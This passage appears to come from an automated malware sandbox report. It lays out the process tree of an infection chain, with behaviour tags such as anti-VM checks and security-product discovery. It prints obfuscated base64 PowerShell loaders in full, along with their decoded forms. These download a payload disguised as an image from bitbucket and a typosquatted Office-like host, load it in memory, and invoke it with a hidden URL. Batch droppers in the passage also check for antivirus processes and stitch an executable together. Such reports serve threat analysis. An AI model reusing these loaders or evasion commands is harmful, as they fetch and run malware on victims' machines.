Q@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\10142260101\m4mrV1B.exe
      "C:\Users\Admin\AppData\Local\Temp\10142260101\m4mrV1B.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:1720
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c 67cc62a429f2f.vbs
        5⤵
        
        PID:1716
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
        6⤵
        
        PID:2328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:556
  - - C:\Users\Admin\AppData\Local\Temp\10142270101\4jblLC1.exe
      "C:\Users\Admin\AppData\Local\Temp\10142270101\4jblLC1.exe"
      4⤵
      Executes dropped EXE
      PID:2068
  - - C:\Users\Admin\AppData\Local\Temp\10142280101\XxzH301.exe
      "C:\Users\Admin\AppData\Local\Temp\10142280101\XxzH301.exe"
      4⤵
      Executes dropped EXE
      PID:564
  - - C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe
      "C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:2960
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2516
      - C:\Windows\SysWOW64\expand.exe
        
        expand Ae.msi Ae.msi.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1084
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:1292
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        
        PID:1080
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:2436
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2416
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 789919
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2596
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Deviation.msi
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2008
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1764
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:936
      - C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
        
        Occupation.com q
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1580
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2732
  - - C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe
      "C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:1112
    - - C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1592
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 1008
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2152
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 500
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2532
  - - C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe
      "C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:1588
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 1188
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2304
  - - C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe
      "C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:1728
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2008
      - C:\Windows\SysWOW64\expand.exe
        
        expand Go.pub Go.pub.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2432
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:1736
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        
        PID:832
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:2340
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:300
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 353090
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1860
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Really.pub
        6⤵
        
        PID:2428
      - C:\Windows\SysWOW64\findstr.exe
        
